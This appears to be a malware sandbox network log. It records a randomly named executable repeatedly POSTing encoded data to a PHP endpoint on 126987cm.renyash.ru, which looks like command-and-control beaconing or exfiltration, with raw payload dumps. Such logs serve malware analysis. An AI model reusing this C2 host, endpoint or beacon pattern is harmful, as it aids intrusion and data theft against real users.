Jan 1, 2025 21:48:25.624209881 CET | 1788 | OUT | Data Raw: 54 53 5b 51 53 47 5c 53 5d 56 5b 57 54 5b 51 52 58 56 58 59 5b 52 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TS[QSG\S]V[WT[QRXVXY[RWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!$(#9\"7\'.35+(?!5$36X(65(X+'*!^&%X*
Jan 1, 2025 21:48:25.717118025 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:26.137073994 CET | 957 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:26 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yaaAkEtSVyzUMTHmFQZTTgrTgqWhNbevw3hs%2FCLQgHihdA5f1V70RbUolbVOWAqtFkJ9LHnON8mxr5C7t%2BikFS0JusvPrrWbZN%2FNmQfO83THLOk6u%2FeX%2BJSSkqdpqGi1ohvojVcW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ec06d8f426a-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3585&min_rtt=1636&rtt_var=4511&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=84745&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 11 3f 1f 33 54 34 32 03 1e 2a 38 0a 02 26 21 08 12 31 33 2a 18 28 01 20 05 2b 3c 27 0d 26 3c 24 19 27 5c 36 0e 3c 32 0e 5b 29 0c 20 5c 05 1b 39 5d 24 17 3b 11 26 3b 0f 1d 3d 30 30 5f 37 06 31 02 28 30 3f 08 21 38 21 10 26 06 39 54 33 3a 2a 55 29 2c 23 5c 29 30 01 1f 26 2d 2a 51 0f 16 38 1f 3e 1e 25 00 29 3c 28 5b 27 08 28 11 35 43 25 55 32 3b 2f 57 24 3a 2d 02 29 2e 3f 56 21 33 0e 0e 25 2f 22 5b 26 10 23 50 3a 10 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98!?3T42*8&!13*( +<'&<$'\6<2[) \9]$;&;=00_71(0?!8!&9T3:*U),#\)0&-*Q8>%)<(['(5C%U2;/W$:-).?V!3%/"[&#P:&^ "S?UV0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.4 | 50017 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:25.392644882 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:25.749278069 CET | 1072 | OUT | Data Raw: 51 55 5b 57 53 40 5c 51 5d 56 5b 57 54 54 51 5f 58 50 58 58 5b 51 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QU[WS@\Q]V[WTTQ_XPXX[QWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!03"2."Z$[+5V+'$!%8T$0&>@!C+0&!^&%X*
Jan 1, 2025 21:48:25.838979959 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:26.097963095 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:26 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BzRXfirnJ29WkPl9NB55YTpeY%2FC4zafSZZy5XUXYKWH4Bz7Y2TMcEaGp2GSC5%2BXLYMY9p74ahDPNdlYM9KlGbecvuebwdYeJtEMgCcmF%2F56RVV9ARxjj9IJ95Ac%2F4Qr2fkbDP0h9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ec138857280-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2158&min_rtt=1896&rtt_var=1236&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=365091&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.4 | 50028 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:26.777942896 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:48:27.142849922 CET | 1072 | OUT | Data Raw: 54 5e 5b 56 53 46 5c 52 5d 56 5b 57 54 5e 51 5d 58 55 58 51 5b 56 57 43 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T^[VSF\R]V[WT^Q]XUXQ[VWCVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_&1;4=">+Z'4_!7U(4#P5/301>&5E(+2:!^&%X*/
Jan 1, 2025 21:48:27.226285934 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:27.406779051 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:27 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pKaE%2FjFDEh%2BosrqbIBhkravfmuT4MCAXwrg6lJqnodYCv6aDq4166I7St%2F3bCkb3Er0IEkU8qrVXLM8cvsZaIjijEEHZa00eil3B6P0IgATeWXF%2B3VRiZNSRFfNOymqqxSmUpbQU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ec9dd894231-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2854&min_rtt=1725&rtt_var=2905&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=135700&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a
                                                                                                                                Data Ascii: 40VX[
Jan 1, 2025 21:48:27.493978024 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0
Jan 1, 2025 21:48:27.725733995 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.4 | 50034 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:27.726341963 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1064
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:48:28.077461004 CET | 1064 | OUT | Data Raw: 51 55 5b 55 53 44 5c 54 5d 56 5b 57 54 5c 51 52 58 55 58 5b 5b 5f 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QU[USD\T]V[WT\QRXUX[[_WBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$1#Y""=5-8$>4^"8#V+$#P!68W$3:[)&=E?- Y&!^&%X*
Jan 1, 2025 21:48:28.178814888 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:28.385804892 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:28 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=REIPxIJTZRZvS34IMsTUcxLTsZ25xoPvmArpKMLkg0rLU%2Ftbupd8tZN4DhzDc8GuUzxyiUikwkCqpNdwmYCj7GtwLQSrcaYQ8iVSZ2AFhKQGNgQhaauFTQsBHPIfdYU6dXXiP%2BEa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ecfc99fc354-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4690&min_rtt=1629&rtt_var=6733&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1385&delivery_rate=55898&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.4 | 50040 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:28.523046017 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1064
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:28.876835108 CET | 1064 | OUT | Data Raw: 51 52 5e 54 56 4a 59 5e 5d 56 5b 57 54 5c 51 5a 58 50 58 59 5b 52 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QR^TVJY^]V[WT\QZXPXY[RWHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$"/Y 1>5>,0-3!'?$;Q"%7$:]>)>. Z&!^&%X*#
Jan 1, 2025 21:48:28.978311062 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:29.232832909 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:29 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Onmfjv%2BE9Co6ccJd31npGUI4aDB1EF8fNPiUm1Es48G3g2tQJkpL972u4VhrZZrGoPaWXBZNqr%2FdVDYm5q63sxA19b68xoLmo6o7EnyvNqEqizsOFduBbSGrQg10FI3HH11HlH8D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ed4cbee42cd-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4480&min_rtt=1579&rtt_var=6396&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1409&delivery_rate=58885&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.4 | 50050 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:29.498138905 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:29.842928886 CET | 1072 | OUT | Data Raw: 54 57 5b 54 53 44 5c 53 5d 56 5b 57 54 5b 51 5b 58 55 58 5a 5b 53 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TW[TSD\S]V[WT[Q[XUXZ[SWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!'X4=Z5$$/"<++"%<' .Z>&%E(X4^1!^&%X*
Jan 1, 2025 21:48:29.969917059 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:30.377978086 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:30 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lj%2FrYAvl84x%2BOZ8nJ%2FFgfksww5iQwFkKBXUiCL2xuY1qszepafTMSlmZH%2FUtYKkZTNTctJQ619aqkCZXrIl6RWM37BbF39vw0h17aZqDLwmLp%2Fbe34kpufAB9lBFsZaGZNkp%2Fg2A"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55edafa60f78d-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4092&min_rtt=1805&rtt_var=5252&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=72611&cwnd=103&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.4 | 50056 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:30.500037909 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:30.858680964 CET | 1072 | OUT | Data Raw: 54 57 5e 52 56 44 59 57 5d 56 5b 57 54 5b 51 5d 58 57 58 50 5b 50 57 49 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TW^RVDYW]V[WT[Q]XWXP[PWIVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Y$T;X 1[!,$=/5*'<"%$V$2*6"(=7%:!^&%X*
Jan 1, 2025 21:48:30.972232103 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:31.147048950 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:31 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V9Qvkolkn9XWA3aCDnyFmVqfGIjp1q0h1y5mBhqE8C9sZn7BE%2B9wAvnjFpYC2z%2BMUuQbtUkAxHwfVqcgAeCSsUWVGV0Ww13z65E6fpEEGEddouZxJK9LBWTM%2B61VxbJst6Wir2S%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ee139914408-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3628&min_rtt=1606&rtt_var=4647&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=82077&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.4 | 50061 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:31.161917925 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1772
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:31.514938116 CET | 1772 | OUT | Data Raw: 54 5e 5b 52 56 46 59 57 5d 56 5b 57 54 5c 51 52 58 56 58 50 5b 5e 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T^[RVFYW]V[WT\QRXVXP[^WHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["''Y"!"5-#0"+<P#6<S3%>%&+-;%:!^&%X*
Jan 1, 2025 21:48:31.608020067 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:31.901730061 CET | 951 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:31 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FYbYMwnR36DlgpwIx0Oe9EzTE8JxfsmT9rzaykGqTLbdNALX097GKIF5xB4CNDvN8bGtEU1WCUd9EJMgFeCyNeeBNejcDwl55std8g2Mp9JC9EW4MsE5Gw4dGwo511s%2FUfaC6BCf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ee53a604391-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3594&min_rtt=1591&rtt_var=4603&sent=4&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2117&delivery_rate=82874&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 54 28 1f 38 0e 37 32 21 1e 29 3b 2b 5f 31 32 2e 1f 25 30 21 41 3c 01 27 5e 2b 11 23 0b 32 5a 24 17 24 39 3d 1b 3c 32 20 5b 2b 36 20 5c 05 1b 3a 05 24 39 2c 02 25 28 39 56 3d 0e 02 58 34 2c 39 06 3e 0d 3c 51 21 28 36 01 26 38 07 52 33 04 31 0d 2b 12 33 5f 3e 56 3f 50 24 3d 2a 51 0f 16 38 53 2a 09 3e 58 2a 12 05 06 33 0f 0e 5b 22 36 25 54 31 05 38 0a 26 2a 25 03 2b 10 3c 0e 35 30 27 57 25 5a 31 00 26 3e 2c 0c 3a 00 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98!T(872!);+_12.%0!A<'^+#2Z$$9=<2 [+6 \:$9,%(9V=X4,9><Q!(6&8R31+3_>V?P$=*Q8S*>X*3["6%T18&*%+<50'W%Z1&>,:&^ "S?UV0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.4 | 50062 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:31.266024113 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:31.624171972 CET  1072               OUT
Jan 1, 2025 21:48:31.710890055 CET  25                 IN         HTTP/1.1 100 Continue
Jan 1, 2025 21:48:32.005961895 CET  815                IN         HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:31 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FDys2x0mh4%2FwEK3jv5qPRM3ib8oUizkvEWIAA%2FoasSL%2Bq53e8istWV6li%2Bzq7MFO0AgISazPv7W3Z2ir%2FvcBKJou8X6j1wykd%2FOPUvtkF2nFFciwr%2FmY5XL%2B9iEgHmNDU4THqyru"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ee5ecf9c352-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2349&min_rtt=1694&rtt_var=1945&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=210495&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
